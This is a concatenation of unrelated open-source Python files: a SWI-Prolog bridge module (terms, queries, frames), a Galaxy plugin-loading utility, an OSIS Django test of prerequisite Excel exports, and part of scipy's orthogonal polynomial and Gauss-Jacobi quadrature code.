return bool(PL_unify_compound(self._handle, functor._handle))
def unify_list(self, head, tail):
"""Unify with a list cell [head | tail] for terms head, tail.
Returns:
bool: True on success.
"""
return bool(PL_unify_list(self._handle, head._handle, tail._handle))
def unify_nil(self):
"""Unify with the list terminator constant.
Returns:
bool: True on success.
"""
return bool(PL_unify_nil(self._handle))
def unify_arg(self, index, arg):
"""Unify the index-th argument of a compound term with term `arg`.
Indexing is 0-based.
Returns:
bool: True on success.
"""
return bool(PL_unify_arg(index + 1, self._handle, arg._handle))
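# Illustrative sketch (not part of the original module): unifying a fresh
# variable with an integer term. Assumes SWI-Prolog has been initialised by
# swilite.core.
def _example_unification():
    x = Term()                   # a fresh variable
    three = Term.from_integer(3)
    assert x.unify(three)        # binds x to 3
    return x.get_integer()       # -> 3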
def _add_from_method_to_class(klass, put_method_name, put_method):
suffix = put_method_name[4:]
from_method_name = 'from_' + suffix
if hasattr(klass, from_method_name):
raise AttributeError('{} method already exists.'.format(
from_method_name))
def from_method(cls, *args, **kwargs):
new_term = cls()
put_method(new_term, *args, **kwargs)
return new_term
from_method.__name__ = from_method_name
from_method.__qualname__ = str(klass.__name__) + '.' + from_method_name
from_method.__doc__ = 'A new Term initialized using `{}`'.format(
put_method_name)
setattr(klass, from_method_name, classmethod(from_method))
# Generate a from_<type> method for each put_<type> method.
for put_method_name in dir(Term):
if not put_method_name.startswith('put_'):
continue
put_method = getattr(Term, put_method_name)
if not callable(put_method):
continue
try:
_add_from_method_to_class(Term, put_method_name, put_method)
except AttributeError as e:
if 'already exists' in str(e):
# Don't add if from_ already exists.
pass
else:
raise
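# Illustrative sketch (not part of the original module): the loop above derives
# Term.from_integer, Term.from_atom_name, Term.from_parsed, etc. from the
# corresponding put_* methods, so terms can be built in a single call.
def _example_generated_constructors():
    three = Term.from_integer(3)
    greeting = Term.from_atom_name('hello')
    items = Term.from_list_terms([three, greeting])
    return str(items)   # roughly '[3,hello]'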
class TemporaryTerm(Term, TemporaryHandleMixIn):
pass
class TermList(HandleWrapper):
"""A collection of term references.
Required by `Term.cons_functor_v` and `Query`.
"""
def __init__(self, length):
self._length = length
super().__init__(handle=PL_new_term_refs(length))
@classmethod
def from_terms(cls, *terms):
termlist = cls(len(terms))
for i, term in enumerate(terms):
termlist[i].put_term(term)
return termlist
def __eq__(self, other):
try:
return super().__eq__(other) and self._length == other._length
except AttributeError as e:
if '_handle' not in str(e):
raise
return NotImplemented
def __str__(self):
return str(list(self))
def __repr__(self):
return 'TermList(handle={handle!r}, length={length!r})'.format(
handle=self._handle,
length=self._length)
def __len__(self):
return self._length
def __getitem__(self, key):
if isinstance(key, int) and key >= 0 and key < self._length:
return Term._from_handle(self._handle + key)
else:
raise IndexError()
class Query():
"""Prolog Query Context Manager."""
_call_predicate = Predicate.from_name_arity('call', 1)
def __init__(self, predicate, *arguments, arglist=None,
goal_context_module=None):
"""Prepare a query.
A query consists of a predicate (`predicate`) and a list of arguments
(`arguments`). Each solution is an assignment to variables in
`arguments` that satisfies the predicate.
A query behaves statefully. The solutions must be read from
`arguments`.
Args:
predicate (Predicate) : Predicate to query.
*arguments (Term) : Terms to pass as arguments to
`predicate`.
arglist (TermList) : List of argument terms to
`predicate`. Cannot pass both arguments and arglist.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
Note
----
Only one query can be active at a time, but the query is not activated
until `__enter__` is called.
"""
if arglist is None:
arglist = TermList.from_terms(*arguments)
elif arguments:
raise ValueError('Cannot provide both "arguments" and "arglist".')
predicate.check_argument_match(arglist)
self.predicate = predicate
self.arglist = arglist
self.goal_context_module = goal_context_module
self.active_query = None
@classmethod
def call_term(cls, term, goal_context_module=None):
"""Prepare a query that will call a single term.
Args:
term (Term) : Term to call.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
See `Query.__init__` for more. Equivalent to:
``Query(Predicate.from_name_arity('call', 1), term)``
"""
return cls(Query._call_predicate, term,
goal_context_module=goal_context_module)
def __str__(self):
return '{pred}({args})'.format(
pred=str(self.predicate).rsplit('/', 1)[0],
args=', '.join(str(arg) for arg in self.arglist))
def __repr__(self):
return ('Query(predicate={predicate!r}, arglist={arglist!r}, '
'goal_context_module={goal_context_module!r})').format(
predicate=self.predicate,
arglist=self.arglist,
goal_context_module=self.goal_context_module)
def __enter__(self):
self.active_query = _ActiveQuery(self)
return self.active_query
def __exit__(self, type, value, traceback):
self.active_query.close()
def term_assignments(self, term, persistent):
"""The value of a term under each solution to the query.
Iterates over all remaining solutions to the query and, for each
solution, yields the current value of `term`.
Args:
term (Term): The term whose assignments to return.
persistent (bool): If True, `TermRecord` objects will be yielded
instead of `TemporaryTerm` so that their value persists
across solutions.
Yields:
Either `TemporaryTerm` or a `TermRecord` representing the
value of `term` under a particular solution.
If `persistent` is ``False``, then `TemporaryTerm` values are
yielded, which are invalidated on the next call to `next_solution`.
"""
if persistent:
yield from self._term_assignments_persistent(term)
else:
yield from self._term_assignments_temporary(term)
def _term_assignments_persistent(self, term):
with self as active_query:
while active_query.next_solution():
yield TermRecord(term)
def _term_assignments_temporary(self, term):
with self as active_query:
while active_query.next_solution():
temporary_term = TemporaryTerm.from_term(term)
active_query.bind_temporary_term(temporary_term)
yield temporary_term
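# Illustrative sketch (not part of the original module): iterating over all
# solutions of member/2 with Query.term_assignments. The list contents are
# invented; assumes SWI-Prolog has been initialised by swilite.core.
def _example_query_solutions():
    member = Predicate.from_name_arity('member', 2)
    x = Term()
    items = Term.from_parsed('[1, 2, 3]')
    query = Query(member, x, items)
    values = [record.get().get_integer()
              for record in query.term_assignments(x, persistent=True)]
    return values   # [1, 2, 3]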
class _ActiveQuery(HandleWrapper, TemporaryHandleMixIn):
"""Interface to an active Prolog Query.
Only one query can be active at a time.
"""
def __init__(self, query):
"""Create an active query. See `Query`
Args:
query (Query) : Query to activate.
"""
self._query = query
super().__init__(handle=PL_open_query(
_get_nullable_handle(query.goal_context_module),
PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION,
query.predicate._handle,
query.arglist._handle))
self._bound_temporary_terms = []
def next_solution(self):
"""Find the next solution, updating `arglist`.
Returns:
bool: ``True`` if a solution was found, otherwise returns
``False``.
Raises:
PrologException: If an exception was raised in Prolog.
Warning
-------
Calling `next_solution` results in backtracking.
All variable bindings and newly-created terms since the last call
will be undone.
Use `TermRecord` to persist terms across backtracks.
"""
success = bool(PL_next_solution(self._handle))
self._invalidate_bound_temporary_terms()
if not success:
exception_term = PL_exception(self._handle)
if exception_term:
raise PrologException(Term._from_handle(exception_term))
return success
def bind_temporary_term(self, term):
"""Bind a temporary term to the current solution state of this query.
The term will be invalidated on the next call to `next_solution`.
Args:
term (TemporaryTerm): Temporary term to bind.
"""
self._bound_temporary_terms.append(term)
def _invalidate_bound_temporary_terms(self):
for term in self._bound_temporary_terms:
term._invalidate()
self._bound_temporary_terms = []
def close(self):
"""Close the query and destroy all data and bindings associated with it.
"""
PL_close_query(self._handle)
self._invalidate()
def __str__(self):
return str(self._query)
def __repr__(self):
return ('_ActiveQuery(query={query!r}, _handle={handle!r})'.format(
query=self._query, handle=self._handle))
def _get_nullable_handle(handle_wrapper):
"""Return the handle of `handle_wrapper` or None"""
if handle_wrapper is None:
return None
else:
return handle_wrapper._handle
class TermRecord(HandleWrapper):
"""Records a Prolog Term so that it can be retrieved later.
This persists across backtracks, unlike `Term` itself.
"""
def __init__(self, term):
"""Create a term record.
Args:
term (Term): Term to record.
"""
super().__init__(PL_record(term._handle))
def get(self):
"""Get the term that was stored in this object.
Returns:
Term: A copy of the stored term.
"""
t = Term()
success = PL_recorded(self._handle, t._handle)
if not success:
raise PrologMemoryError()
return t
def __del__(self):
PL_erase(self._handle)
class Frame(HandleWrapper, TemporaryHandleMixIn):
"""A prolog frame context.
All term references (and optionally, data modifications) created within the
frame are discarded at the close of the frame.
With close(), used to create temporary term refences.
With discard(), used to undo unifications and other data modifications.
It is best to use the frame in a python context. i.e.:
>>> X = Term()
>>> eq = Predicate.from_name_arity('=', 2)
>>> with Frame() as frame:
... for i in range(3):
... t = frame.term()
... t.put_integer(i)
... eq(X, t) and None
... print(X)
... frame.rewind()
0
1
2
Warning:
Term objects created using the `Term` class constructors after the
frame is opened will produce undefined behaviour (likely segfault) if
used after the frame is closed, discarded, or rewound. Instead, use
the `term()` method to get `Term` objects with proper error handling.
Warning:
While the SWI-Prolog documentation doesn't specifically warn against
it, it is probably a bad idea to open and close multiple frames in
anything other than stack order.
Note:
Frames have no effect on the prolog dynamic database (assertz).
"""
def __init__(self, discard=False):
"""Open the frame.
Args:
discard (bool): If true, __exit__ calls discard() instead of
close().
"""
super().__init__(handle=PL_open_foreign_frame())
self.discard_on_exit = discard
self._associated_terms = []
def close(self):
"""Close the frame.
Discard all term references created since the frame was opened,
retaining all other prolog data.
"""
self._invalidate_associated_terms()
PL_close_foreign_frame(self._handle)
self._invalidate()
def discard(self):
"""Discard the frame.
Discard all term references, bindings, and prolog data created since
the frame was opened.
"""
self._invalidate_associated_terms()
PL_discard_foreign_frame(self._handle)
self._invalidate()
def rewind(self):
"""Rewind the frame.
Undo all bindings and discard all term references created since the
frame was opened. Does not pop the frame.
"""
self._invalidate_associated_terms()
PL_rewind_foreign_frame(self._handle)
def term(self):
"""Safely create Term objects within this frame.
The returned terms will be invalidated _in Python_ when this frame is
closed, discarded, or rewound.
Term objects created within the frame using the `Term` class will by
invalidated in Prolog at the end of the frame, but _not_ in Python.
As a result, continuing to use those objects will produce undefined
behaviour, likely a segfault.
Conversely, the `TemporaryTerm` objects returned by this method will
produce a catchable Python exception if used after invalidation,
rather than immediately terminating the program with a segfault.
"""
term = TemporaryTerm()
self._associated_terms.append(term)
return term
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if self.discard_on_exit:
self.discard()
else:
self.close()
def _invalidate_associated_terms(self):
for term in self._associated_terms:
term._invalidate()
self._associated_terms = []
| mit | -278,160,444,804,315,000 | 30.287293 | 80 | 0.567858 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/util/plugin_config.py | 1 | 2386 | from xml.etree import ElementTree
try:
from galaxy import eggs
eggs.require('PyYAML')
except Exception:
# If not in Galaxy, ignore this.
pass
try:
import yaml
except ImportError:
yaml = None
from galaxy.util.submodules import submodules
def plugins_dict(module, plugin_type_identifier):
""" Walk through all classes in submodules of module and find ones labelled
with specified plugin_type_identifier and throw in a dictionary to allow
constructions from plugins by these types later on.
"""
plugin_dict = {}
for plugin_module in submodules( module ):
# FIXME: this is not how one is supposed to use __all__; why did you do
# this, past John?
for clazz in plugin_module.__all__:
plugin_type = getattr( clazz, plugin_type_identifier, None )
if plugin_type:
plugin_dict[ plugin_type ] = clazz
return plugin_dict
def load_plugins(plugins_dict, plugin_source, extra_kwds={}):
source_type, source = plugin_source
if source_type == "xml":
return __load_plugins_from_element(plugins_dict, source, extra_kwds)
else:
return __load_plugins_from_dicts(plugins_dict, source, extra_kwds)
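# Illustrative sketch (not part of the original module): how a plugins dict and
# a dict-style plugin source feed load_plugins(). FileAction and the 'file'
# type name are invented for the example.
def _example_load_plugins():
    class FileAction(object):
        action_type = "file"   # value matched by plugins_dict's identifier

        def __init__(self, **kwds):
            self.path = kwds.get("path")

    available = {"file": FileAction}   # what plugins_dict() would build
    configs = [{"type": "file", "path": "/tmp/example"}]
    return load_plugins(available, ("dict", configs))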
def __load_plugins_from_element(plugins_dict, plugins_element, extra_kwds):
plugins = []
for plugin_element in plugins_element.getchildren():
plugin_type = plugin_element.tag
plugin_kwds = dict( plugin_element.items() )
plugin_kwds.update( extra_kwds )
plugin = plugins_dict[ plugin_type ]( **plugin_kwds )
plugins.append( plugin )
return plugins
def __load_plugins_from_dicts(plugins_dict, configs, extra_kwds):
plugins = []
for config in configs:
plugin_type = config[ "type" ]
plugin_kwds = config
plugin_kwds.update( extra_kwds )
plugin = plugins_dict[ plugin_type ]( **plugin_kwds )
plugins.append( plugin )
return plugins
def plugin_source_from_path(path):
if path.endswith(".yaml") or path.endswith(".yml"):
return ('dict', __read_yaml(path))
else:
return ('xml', ElementTree.parse( path ).getroot())
def __read_yaml(path):
if yaml is None:
raise ImportError("Attempting to read YAML configuration file - but PyYAML dependency unavailable.")
with open(path, "rb") as f:
return yaml.load(f)
| gpl-3.0 | -1,747,664,163,855,154,200 | 28.45679 | 108 | 0.650042 | false |
uclouvain/OSIS-Louvain | program_management/tests/business/test_excel.py | 1 | 6599 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.test import TestCase
from django.utils.translation import gettext_lazy as _
from base.models.enums.prerequisite_operator import AND, OR
from base.tests.factories.education_group_year import EducationGroupYearFactory
from base.tests.factories.group_element_year import GroupElementYearChildLeafFactory, GroupElementYearFactory
from base.tests.factories.prerequisite import PrerequisiteFactory
from program_management.business.excel import EducationGroupYearLearningUnitsPrerequisitesToExcel, \
EducationGroupYearLearningUnitsIsPrerequisiteOfToExcel, _get_blocks_prerequisite_of
class TestGeneratePrerequisitesWorkbook(TestCase):
@classmethod
def setUpTestData(cls):
cls.education_group_year = EducationGroupYearFactory()
cls.child_leaves = GroupElementYearChildLeafFactory.create_batch(
6,
parent=cls.education_group_year
)
luy_acronyms = ["LCORS124" + str(i) for i in range(0, len(cls.child_leaves))]
for node, acronym in zip(cls.child_leaves, luy_acronyms):
node.child_leaf.acronym = acronym
node.child_leaf.save()
cls.luy_children = [child.child_leaf for child in cls.child_leaves]
PrerequisiteFactory(
learning_unit_year=cls.luy_children[0],
education_group_year=cls.education_group_year,
items__groups=(
(cls.luy_children[1],),
)
)
PrerequisiteFactory(
learning_unit_year=cls.luy_children[2],
education_group_year=cls.education_group_year,
items__groups=(
(cls.luy_children[3],),
(cls.luy_children[4], cls.luy_children[5])
)
)
cls.workbook_prerequisites = \
EducationGroupYearLearningUnitsPrerequisitesToExcel(cls.education_group_year)._to_workbook()
cls.workbook_is_prerequisite = \
EducationGroupYearLearningUnitsIsPrerequisiteOfToExcel(cls.education_group_year)._to_workbook()
cls.sheet_prerequisites = cls.workbook_prerequisites.worksheets[0]
cls.sheet_is_prerequisite = cls.workbook_is_prerequisite.worksheets[0]
def test_header_lines(self):
expected_headers = [
[self.education_group_year.acronym, self.education_group_year.title, _('Code'), _('Title'),
_('Cred. rel./abs.'), _('Block'), _('Mandatory')],
[_("Official"), None, None, None, None, None, None]
]
headers = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A1:G2")]
self.assertListEqual(headers, expected_headers)
def test_when_learning_unit_year_has_one_prerequisite(self):
expected_content = [
[self.luy_children[0].acronym, self.luy_children[0].complete_title, None, None, None, None, None],
[_("has as prerequisite") + " :", '',
self.luy_children[1].acronym,
self.luy_children[1].complete_title_i18n,
"{} / {}".format(self.child_leaves[1].relative_credits, self.luy_children[1].credits),
str(self.child_leaves[1].block) if self.child_leaves[1].block else '',
_("Yes") if self.child_leaves[1].is_mandatory else _("No")]
]
content = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A3:G4")]
self.assertListEqual(expected_content, content)
def test_when_learning_unit_year_has_multiple_prerequisites(self):
expected_content = [
[self.luy_children[2].acronym, self.luy_children[2].complete_title, None, None, None, None, None],
[_("has as prerequisite") + " :", '', self.luy_children[3].acronym,
self.luy_children[3].complete_title_i18n,
"{} / {}".format(self.child_leaves[3].relative_credits, self.luy_children[3].credits),
str(self.child_leaves[3].block) if self.child_leaves[3].block else '',
_("Yes") if self.child_leaves[3].is_mandatory else _("No")],
['', _(AND), "(" + self.luy_children[4].acronym, self.luy_children[4].complete_title_i18n,
"{} / {}".format(self.child_leaves[4].relative_credits, self.luy_children[4].credits),
str(self.child_leaves[4].block) if self.child_leaves[4].block else '',
_("Yes") if self.child_leaves[4].is_mandatory else _("No")
],
['', _(OR), self.luy_children[5].acronym + ")", self.luy_children[5].complete_title_i18n,
"{} / {}".format(self.child_leaves[5].relative_credits, self.luy_children[5].credits),
str(self.child_leaves[5].block) if self.child_leaves[5].block else '',
_("Yes") if self.child_leaves[5].is_mandatory else _("No")
]
]
content = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A5:G8")]
self.assertListEqual(expected_content, content)
def test_get_blocks_prerequisite_of(self):
gey = GroupElementYearFactory(block=123)
self.assertEqual(_get_blocks_prerequisite_of(gey), '1 ; 2 ; 3')
gey = GroupElementYearFactory(block=1)
self.assertEqual(_get_blocks_prerequisite_of(gey), '1')
def row_to_value(sheet_row):
return [cell.value for cell in sheet_row]
| agpl-3.0 | 8,218,960,028,132,070,000 | 47.874074 | 110 | 0.637617 | false |
jakevdp/scipy | scipy/special/orthogonal.py | 1 | 58856 | """
A collection of functions to find the weights and abscissas for
Gaussian Quadrature.
These calculations are done by finding the eigenvalues of a
tridiagonal matrix whose entries are dependent on the coefficients
in the recursion formula for the orthogonal polynomials with the
corresponding weighting function over the interval.
Many recursion relations for orthogonal polynomials are given:
.. math::
a1n f_{n+1} (x) = (a2n + a3n x ) f_n (x) - a4n f_{n-1} (x)
The recursion relation of interest is
.. math::
P_{n+1} (x) = (x - A_n) P_n (x) - B_n P_{n-1} (x)
where :math:`P` has a different normalization than :math:`f`.
The coefficients can be found as:
.. math::
A_n = -a2n / a3n
\\qquad
B_n = ( a4n / a3n \\sqrt{h_{n-1} / h_n})^2
where
.. math::
h_n = \\int_a^b w(x) f_n(x)^2 \\, dx
assume:
.. math::
P_0 (x) = 1
\\qquad
P_{-1} (x) = 0
For the mathematical background, see [golub.welsch-1969-mathcomp]_ and
[abramowitz.stegun-1965]_.
References
----------
.. [golub.welsch-1969-mathcomp]
Golub, Gene H, and John H Welsch. 1969. Calculation of Gauss
Quadrature Rules. *Mathematics of Computation* 23, 221-230+s1--s10.
.. [abramowitz.stegun-1965]
Abramowitz, Milton, and Irene A Stegun. (1965) *Handbook of
Mathematical Functions: with Formulas, Graphs, and Mathematical
Tables*. Gaithersburg, MD: National Bureau of Standards.
http://www.math.sfu.ca/~cbm/aands/
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
#
# Author: Travis Oliphant 2000
# Updated Sep. 2003 (fixed bugs --- tested to be accurate)
from __future__ import division, print_function, absolute_import
# Scipy imports.
import numpy as np
from numpy import (exp, inf, pi, sqrt, floor, sin, cos, around, int,
hstack, arccos, arange)
from scipy import linalg
from scipy.special import airy
# Local imports.
from . import _ufuncs as cephes
_gam = cephes.gamma
from . import specfun
_polyfuns = ['legendre', 'chebyt', 'chebyu', 'chebyc', 'chebys',
'jacobi', 'laguerre', 'genlaguerre', 'hermite',
'hermitenorm', 'gegenbauer', 'sh_legendre', 'sh_chebyt',
'sh_chebyu', 'sh_jacobi']
# Correspondence between new and old names of root functions
_rootfuns_map = {'roots_legendre': 'p_roots',
'roots_chebyt': 't_roots',
'roots_chebyu': 'u_roots',
'roots_chebyc': 'c_roots',
'roots_chebys': 's_roots',
'roots_jacobi': 'j_roots',
'roots_laguerre': 'l_roots',
'roots_genlaguerre': 'la_roots',
'roots_hermite': 'h_roots',
'roots_hermitenorm': 'he_roots',
'roots_gegenbauer': 'cg_roots',
'roots_sh_legendre': 'ps_roots',
'roots_sh_chebyt': 'ts_roots',
'roots_sh_chebyu': 'us_roots',
'roots_sh_jacobi': 'js_roots'}
_evalfuns = ['eval_legendre', 'eval_chebyt', 'eval_chebyu',
'eval_chebyc', 'eval_chebys', 'eval_jacobi',
'eval_laguerre', 'eval_genlaguerre', 'eval_hermite',
'eval_hermitenorm', 'eval_gegenbauer',
'eval_sh_legendre', 'eval_sh_chebyt', 'eval_sh_chebyu',
'eval_sh_jacobi']
__all__ = _polyfuns + list(_rootfuns_map.keys()) + _evalfuns + ['poch', 'binom']
class orthopoly1d(np.poly1d):
def __init__(self, roots, weights=None, hn=1.0, kn=1.0, wfunc=None,
limits=None, monic=False, eval_func=None):
equiv_weights = [weights[k] / wfunc(roots[k]) for
k in range(len(roots))]
mu = sqrt(hn)
if monic:
evf = eval_func
if evf:
eval_func = lambda x: evf(x) / kn
mu = mu / abs(kn)
kn = 1.0
# compute coefficients from roots, then scale
poly = np.poly1d(roots, r=True)
np.poly1d.__init__(self, poly.coeffs * float(kn))
# TODO: In numpy 1.13, there is no need to use __dict__ to access attributes
self.__dict__['weights'] = np.array(list(zip(roots,
weights, equiv_weights)))
self.__dict__['weight_func'] = wfunc
self.__dict__['limits'] = limits
self.__dict__['normcoef'] = mu
# Note: eval_func will be discarded on arithmetic
self.__dict__['_eval_func'] = eval_func
def __call__(self, v):
if self._eval_func and not isinstance(v, np.poly1d):
return self._eval_func(v)
else:
return np.poly1d.__call__(self, v)
def _scale(self, p):
if p == 1.0:
return
try:
self._coeffs
except AttributeError:
self.__dict__['coeffs'] *= p
else:
            # the coeffs attr is being made private in future versions of numpy
self._coeffs *= p
evf = self._eval_func
if evf:
self.__dict__['_eval_func'] = lambda x: evf(x) * p
self.__dict__['normcoef'] *= p
def _gen_roots_and_weights(n, mu0, an_func, bn_func, f, df, symmetrize, mu):
"""[x,w] = gen_roots_and_weights(n,an_func,sqrt_bn_func,mu)
Returns the roots (x) of an nth order orthogonal polynomial,
and weights (w) to use in appropriate Gaussian quadrature with that
orthogonal polynomial.
The polynomials have the recurrence relation
P_n+1(x) = (x - A_n) P_n(x) - B_n P_n-1(x)
an_func(n) should return A_n
    bn_func(n) should return sqrt(B_n)
    mu0 ( = h_0 ) is the integral of the weight over the orthogonal
    interval
"""
k = np.arange(n, dtype='d')
c = np.zeros((2, n))
c[0,1:] = bn_func(k[1:])
c[1,:] = an_func(k)
x = linalg.eigvals_banded(c, overwrite_a_band=True)
# improve roots by one application of Newton's method
y = f(n, x)
dy = df(n, x)
x -= y/dy
fm = f(n-1, x)
fm /= np.abs(fm).max()
dy /= np.abs(dy).max()
w = 1.0 / (fm * dy)
if symmetrize:
w = (w + w[::-1]) / 2
x = (x - x[::-1]) / 2
w *= mu0 / w.sum()
if mu:
return x, w, mu0
else:
return x, w
# Jacobi Polynomials 1 P^(alpha,beta)_n(x)
def roots_jacobi(n, alpha, beta, mu=False):
r"""Gauss-Jacobi quadrature.
Computes the sample points and weights for Gauss-Jacobi quadrature. The
sample points are the roots of the n-th degree Jacobi polynomial,
:math:`P^{\alpha, \beta}_n(x)`. These sample points and weights
correctly integrate polynomials of degree :math:`2n - 1` or less over the
interval :math:`[-1, 1]` with weight function
:math:`f(x) = (1 - x)^{\alpha} (1 + x)^{\beta}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -1
beta : float
        beta must be > -1
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha <= -1 or beta <= -1:
raise ValueError("alpha and beta must be greater than -1.")
if alpha == 0.0 and beta == 0.0:
return roots_legendre(m, mu)
if alpha == beta:
return roots_gegenbauer(m, alpha+0.5, mu)
mu0 = 2.0**(alpha+beta+1)*cephes.beta(alpha+1, beta+1)
a = alpha
b = beta
if a + b == 0.0:
an_func = lambda k: np.where(k == 0, (b-a)/(2+a+b), 0.0)
else:
an_func = lambda k: np.where(k == 0, (b-a)/(2+a+b),
(b*b - a*a) / ((2.0*k+a+b)*(2.0*k+a+b+2)))
bn_func = lambda k: 2.0 / (2.0*k+a+b)*np.sqrt((k+a)*(k+b) / (2*k+a+b+1)) \
* np.where(k == 1, 1.0, np.sqrt(k*(k+a+b) / (2.0*k+a+b-1)))
f = lambda n, x: cephes.eval_jacobi(n, a, b, x)
df = lambda n, x: 0.5 * (n + a + b + 1) \
* cephes.eval_jacobi(n-1, a+1, b+1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, False, mu)
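# Illustrative check (doctest-style sketch): with alpha = beta = 0 the rule
# reduces to Gauss-Legendre, so three points integrate x**4 over [-1, 1] exactly.
#     >>> x, w = roots_jacobi(3, 0.0, 0.0)
#     >>> np.allclose(np.sum(w * x**4), 2.0 / 5.0)
#     True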
def jacobi(n, alpha, beta, monic=False):
r"""Jacobi polynomial.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}P_n^{(\alpha, \beta)}
+ (\beta - \alpha - (\alpha + \beta + 2)x)
\frac{d}{dx}P_n^{(\alpha, \beta)}
+ n(n + \alpha + \beta + 1)P_n^{(\alpha, \beta)} = 0
for :math:`\alpha, \beta > -1`; :math:`P_n^{(\alpha, \beta)}` is a
polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
alpha : float
Parameter, must be greater than -1.
beta : float
Parameter, must be greater than -1.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Jacobi polynomial.
Notes
-----
For fixed :math:`\alpha, \beta`, the polynomials
:math:`P_n^{(\alpha, \beta)}` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x)^\alpha(1 + x)^\beta`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: (1 - x)**alpha * (1 + x)**beta
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (-1, 1), monic,
eval_func=np.ones_like)
x, w, mu = roots_jacobi(n, alpha, beta, mu=True)
ab1 = alpha + beta + 1.0
hn = 2**ab1 / (2 * n + ab1) * _gam(n + alpha + 1)
hn *= _gam(n + beta + 1.0) / _gam(n + 1) / _gam(n + ab1)
kn = _gam(2 * n + ab1) / 2.0**n / _gam(n + 1) / _gam(n + ab1)
# here kn = coefficient on x^n term
p = orthopoly1d(x, w, hn, kn, wfunc, (-1, 1), monic,
lambda x: eval_jacobi(n, alpha, beta, x))
return p
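# Illustrative check (doctest-style sketch): Jacobi polynomials satisfy
# P_n^{(alpha, beta)}(1) = binom(n + alpha, n), e.g. P_2^{(1, 1)}(1) = 3.
#     >>> np.allclose(jacobi(2, 1.0, 1.0)(1.0), 3.0)
#     True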
# Jacobi Polynomials shifted G_n(p,q,x)
def roots_sh_jacobi(n, p1, q1, mu=False):
"""Gauss-Jacobi (shifted) quadrature.
Computes the sample points and weights for Gauss-Jacobi (shifted)
quadrature. The sample points are the roots of the n-th degree shifted
Jacobi polynomial, :math:`G^{p,q}_n(x)`. These sample points and weights
correctly integrate polynomials of degree :math:`2n - 1` or less over the
interval :math:`[0, 1]` with weight function
:math:`f(x) = (1 - x)^{p-q} x^{q-1}`
Parameters
----------
n : int
quadrature order
p1 : float
(p1 - q1) must be > -1
q1 : float
q1 must be > 0
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
if (p1-q1) <= -1 or q1 <= 0:
raise ValueError("(p - q) must be greater than -1, and q must be greater than 0.")
x, w, m = roots_jacobi(n, p1-q1, q1-1, True)
x = (x + 1) / 2
scale = 2.0**p1
w /= scale
m /= scale
if mu:
return x, w, m
else:
return x, w
def sh_jacobi(n, p, q, monic=False):
r"""Shifted Jacobi polynomial.
Defined by
.. math::
G_n^{(p, q)}(x)
= \binom{2n + p - 1}{n}^{-1}P_n^{(p - q, q - 1)}(2x - 1),
where :math:`P_n^{(\cdot, \cdot)}` is the nth Jacobi polynomial.
Parameters
----------
n : int
Degree of the polynomial.
p : float
Parameter, must have :math:`p > q - 1`.
q : float
Parameter, must be greater than 0.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
G : orthopoly1d
Shifted Jacobi polynomial.
Notes
-----
For fixed :math:`p, q`, the polynomials :math:`G_n^{(p, q)}` are
orthogonal over :math:`[0, 1]` with weight function :math:`(1 -
x)^{p - q}x^{q - 1}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: (1.0 - x)**(p - q) * (x)**(q - 1.)
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (-1, 1), monic,
eval_func=np.ones_like)
n1 = n
x, w, mu0 = roots_sh_jacobi(n1, p, q, mu=True)
hn = _gam(n + 1) * _gam(n + q) * _gam(n + p) * _gam(n + p - q + 1)
hn /= (2 * n + p) * (_gam(2 * n + p)**2)
# kn = 1.0 in standard form so monic is redundant. Kept for compatibility.
kn = 1.0
pp = orthopoly1d(x, w, hn, kn, wfunc=wfunc, limits=(0, 1), monic=monic,
eval_func=lambda x: eval_sh_jacobi(n, p, q, x))
return pp
# Generalized Laguerre L^(alpha)_n(x)
